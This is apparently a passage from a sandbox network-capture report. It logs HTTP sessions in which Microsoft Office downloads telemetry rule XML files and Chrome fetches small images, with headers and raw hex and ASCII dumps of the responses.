                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1378INData Raw: 00 00 ff ee 00 00 ff f6 00 00 00 35 ff d0 00 00 00 00 ff f3 ff f6 00 00 00 00 00 00 00 00 00 00 00 00 ff f6 00 00 ff fd 00 03 00 0e 00 00 00 07 00 00 00 00 ff f6 00 00 00 00 00 00 00 00 00 00 00 00 ff ec 00 0a ff ef 00 14 00 0a 00 00 00 00 00 00 00 00 ff ef 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff e2 ff e8 00 00 00 00 00 00 00 00 00 00 00 00 ff d1 00 00 ff ee ff f6 ff f6 00 00 ff ec 00 00 ff d1 ff d6 ff ca 00 00 ff ce 00 00 ff c7 ff d1 ff bd 00 00 00 00 00 00 00 00 ff e2 00 0a ff d1 00 00 ff b7 00 00 00 3f ff c7 00 00 ff bd ff c7 ff c7 00 00 00 00 00 00 00 00 00 03 00 03 ff f2 ff ad 00 15 ff ef ff f6 00 07 00 0e 00 11 00 07 00 07 00 00 00 00 00 00 00 06 ff f6 ff fc ff ce 00 00 ff d1 00 06 00 3c ff ce 00 25 ff d5 ff de ff d3 00 00 ff f3 00 00 00 00 00
                                                                                                                                                                                                                                                                                Data Ascii: 5?<%
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC1378INData Raw: 00 19 00 02 02 43 00 00 02 4e 00 19 00 03 02 57 00 19 02 59 00 19 02 5b 00 19 00 03 01 4f 00 1c 01 50 00 1c 01 51 00 1c 00 02 01 4f 00 00 01 50 00 00 00 02 01 4f 00 00 01 50 00 00 00 03 01 4f 00 64 01 50 00 64 01 51 00 64 00 03 01 4f 00 1c 01 50 00 1c 01 51 00 1c 00 02 01 4f 00 00 01 50 00 00 00 02 01 4f 00 00 01 50 00 00 00 0f 01 42 00 35 01 43 00 15 01 44 00 2b 01 45 00 2c 01 46 00 2c 01 49 00 38 01 4b 00 2c 01 4c 00 35 01 4d 00 06 01 4e 00 2f 01 4f 00 6b 01 50 00 6b 01 51 00 6b 01 5c 00 50 01 98 00 18 00 0f 01 42 00 35 01 43 00 15 01 44 00 2b 01 45 00 2c 01 46 00 2c 01 49 00 38 01 4b 00 2c 01 4c 00 35 01 4d 00 06 01 4e 00 2f 01 4f 00 6b 01 50 00 6b 01 51 00 6b 01 5c 00 50 01 98 00 18 00 0f 01 42 00 35 01 43 00 15 01 44 00 2b 01 45 00 2c 01 46 00 2c 01
                                                                                                                                                                                                                                                                                Data Ascii: CNWY[OPQOPOPOdPdQdOPQOPOPB5CD+E,F,I8K,L5MN/OkPkQk\PB5CD+E,F,I8K,L5MN/OkPkQk\PB5CD+E,F,


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                61192.168.2.64979413.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC192OUTGET /rules/rule120635v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 420
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9DAE3EC0"
                                                                                                                                                                                                                                                                                x-ms-request-id: 10df1352-f01e-00aa-105a-178521000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144159Z-1657d5bbd482lxwq1dp2t1zwkc00000001ug00000000fsge
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC420INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                62192.168.2.64979713.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC192OUTGET /rules/rule120638v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 486
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:35 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B92FCB436"
                                                                                                                                                                                                                                                                                x-ms-request-id: b8f8ddc8-601e-0001-115a-17faeb000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144159Z-1657d5bbd48gqrfwecymhhbfm800000000yg000000009qdk
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC486INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120638" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                63192.168.2.64979813.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC192OUTGET /rules/rule120639v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 423
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:36 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BB7564CE8"
                                                                                                                                                                                                                                                                                x-ms-request-id: a2d01d3c-801e-0083-4800-17f0ae000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144159Z-1657d5bbd487nf59mzf5b3gk8n00000001t0000000007qe9
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC423INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 44 64 5d 5b 59 79 5d 5b 4e 6e 5d 5b 41 61 5d 5b 42 62 5d 5b 4f 6f 5d 5b 4f 6f 5d 5b 4b 6b 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120639" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120637" /> <SR T="2" R="([Dd][Yy][Nn][Aa][Bb][Oo][Oo][Kk])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                64192.168.2.64979613.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC192OUTGET /rules/rule120637v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 427
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582BA909FA21"
                                                                                                                                                                                                                                                                                x-ms-request-id: a62739ea-301e-005d-6402-17e448000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144159Z-1657d5bbd48qjg85buwfdynm5w000000023g00000000m6cv
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 4e 6e 5d 5b 41 61 5d 5b 53 73 5d 5b 4f 6f 5d 5b 4e 6e 5d 5b 49 69 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120637" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <SR T="2" R="([Pp][Aa][Nn][Aa][Ss][Oo][Nn][Ii][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                65192.168.2.649799172.67.128.1594433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC408OUTGET /public/uploads/preview/black-instagram-logo-png-11574831789epgjpjrwg6.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: starpng.com
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC832INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:42:01 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                                                                                                Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                                                                                                                                                                                                                Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                                                                                                                                                                                                                Retry-After: 86400
                                                                                                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                CF-Cache-Status: BYPASS
                                                                                                                                                                                                                                                                                Set-Cookie: PHPSESSID=386536287ce9169afd5be6cc9cdd7794; path=/
                                                                                                                                                                                                                                                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WowjXUUWB8AxQ590c7BRbujpM17SBZBT7g%2FLPTEg%2FlSvzU0KqpmW05qlqZ1gy9h4ilmozPBb2gkc9gQcGBoafO%2BJP6ofrd6wwPt%2BAfT%2BLtZNYyiphpibCh2EjGhiNw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                                Speculation-Rules: "/cdn-cgi/speculation"
                                                                                                                                                                                                                                                                                Server: cloudflare
                                                                                                                                                                                                                                                                                CF-RAY: 8ce66a5b9af143b0-EWR
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC537INData Raw: 37 39 66 0d 0a 0d 0a 0d 0a 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 44 26 72 73 71 75 6f 3b 41 71 75 69 6e 6f 27 73 20 4c 69 71 75 6f 72 20 69 73 20 75 6e 64 65 72 20 63 6f 6e 73 74 72 75 63 74 69 6f 6e 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 0d 0a 20 20 20 20 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 62 75 6e 6e 79 2e 6e 65 74 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 52 6f 62 6f 74 6f 3a 34 30 30 2c 39 30 30 22 3e 0d 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 71 75 69 6e 6f 6c 69 71 75 6f 72 2e 63 6f 6d 2e 61
                                                                                                                                                                                                                                                                                Data Ascii: 79f <title>D&rsquo;Aquino's Liquor is under construction</title> <link rel="stylesheet" href="https://fonts.bunny.net/css?family=Roboto:400,900"> <link rel="stylesheet" href="https://daquinoliquor.com.a
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC1369INData Raw: 2f 2f 64 61 71 75 69 6e 6f 6c 69 71 75 6f 72 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 6d 61 64 5f 64 65 73 69 67 6e 65 72 2f 73 74 79 6c 65 2e 63 73 73 3f 76 3d 33 2e 39 37 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 61 71 75 69 6e 6f 6c 69 71 75 6f 72 2e 63 6f 6d 2e 61 75 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 75 6e 64 65 72 2d 63 6f 6e 73 74 72 75 63 74 69 6f 6e 2d 70 61 67 65 2f 74 68 65 6d 65 73 2f 63 73 73 2f 66 6f 6e 74 2d 61 77 65 73 6f 6d 65 2e 6d 69 6e 2e 63 73 73 3f 76
                                                                                                                                                                                                                                                                                Data Ascii: //daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/mad_designer/style.css?v=3.97" type="text/css"><link rel="stylesheet" href="https://daquinoliquor.com.au/wp-content/plugins/under-construction-page/themes/css/font-awesome.min.css?v
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC52INData Raw: 73 20 66 61 2d 32 78 22 20 61 72 69 61 2d 68 69 64 64 65 6e 3d 22 74 72 75 65 22 3e 3c 2f 69 3e 3c 2f 61 3e 3c 2f 64 69 76 3e 0d 0a 20 20 0d 0a 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: s fa-2x" aria-hidden="true"></i></a></div>
                                                                                                                                                                                                                                                                                2024-10-06 14:42:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                66192.168.2.64979513.107.246.45443
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC192OUTGET /rules/rule120636v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip
                                                                                                                                                                                                                                                                                User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                                                Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                Content-Type: text/xml
                                                                                                                                                                                                                                                                                Content-Length: 472
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                                                Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                                                                                                                                                                                                                                ETag: "0x8DC582B9D43097E"
                                                                                                                                                                                                                                                                                x-ms-request-id: b27116a7-a01e-003d-3a00-1798d7000000
                                                                                                                                                                                                                                                                                x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                                                x-azure-ref: 20241006T144159Z-1657d5bbd48qjg85buwfdynm5w0000000270000000009rvt
                                                                                                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                                                X-Cache: TCP_HIT
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                                                Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                67192.168.2.649800199.36.158.1004433568C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC583OUTGET /b45b49df5eed87c4c880c5880c8b4f1f.png HTTP/1.1
                                                                                                                                                                                                                                                                                Host: ruletridominium.web.app
                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                                                                                                                                                                                Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                                Sec-Fetch-Dest: image
                                                                                                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC590INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                                                                                                Content-Length: 416
                                                                                                                                                                                                                                                                                Cache-Control: max-age=3600
                                                                                                                                                                                                                                                                                Content-Type: image/png
                                                                                                                                                                                                                                                                                Etag: "7edb70bd3ab8a8a32582d99129e3eac01dadd9c5b55c8ae2867ea5e2997e1a56"
                                                                                                                                                                                                                                                                                Last-Modified: Sat, 19 Feb 2022 17:52:41 GMT
                                                                                                                                                                                                                                                                                Strict-Transport-Security: max-age=31556926; includeSubDomains; preload
                                                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                Date: Sun, 06 Oct 2024 14:41:59 GMT
                                                                                                                                                                                                                                                                                X-Served-By: cache-ewr-kewr1740069-EWR
                                                                                                                                                                                                                                                                                X-Cache: HIT
                                                                                                                                                                                                                                                                                X-Cache-Hits: 0
                                                                                                                                                                                                                                                                                X-Timer: S1728225720.916288,VS0,VE5
                                                                                                                                                                                                                                                                                Vary: x-fh-requested-host, accept-encoding
                                                                                                                                                                                                                                                                                alt-svc: h3=":443";ma=86400,h3-29=":443";ma=86400,h3-27=":443";ma=86400
                                                                                                                                                                                                                                                                                2024-10-06 14:41:59 UTC416INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 20 00 00 00 20 08 03 00 00 00 44 a4 8a c6 00 00 00 51 50 4c 54 45 ff 9e 03 ff 9d 01 ff a7 18 ff c4 57 ff c4 57 ff cc 69 ff d3 7a ff d3 79 ff ac 22 ff b9 3f ff cf 71 ff ac 22 ff cb 69 ff c8 61 ff a3 0e ff a0 06 ff bf 4e ff ba 42 ff b0 2a ff b6 37 ff d1 78 ff de a3 ff d6 8e ff ff fd ff ef d1 ff e6 bb ff f7 e8 9c c9 a4 9f 00 00 00 0a 74 52 4e 53 85 3f ff ff 85 85 3f 85 85 85 95 92 09 4c 00 00 00 f4 49 44 41 54 38 cb a5 8f db 72 84 20 0c 40 b3 45 d7 15 b1 05 21 98 f0 ff 1f ba 41 d4 fa d0 c9 d8 d9 e3 70 4b 8e 21 c0 73 50 79 c2 90 54 06 18 ac ca 00 bd 2e f4 d0 3b 95 3b c2 ac d2 43 a7 0b 1d 74 46 e5 3f 82 f7 a6 7d e6 3a 44 f0 0d 63 33 22 e6 34 1b 7f a5 83 71 5b 1d d2 da 28 94 e7 8b 30 c2 18 42 98 b1 ac 85
                                                                                                                                                                                                                                                                                Data Ascii: PNGIHDR DQPLTEWWizy"?q"iaNB*7xtRNS??LIDAT8r @E!ApK!sPyT.;;CtF?}:Dc3"4q[(0B


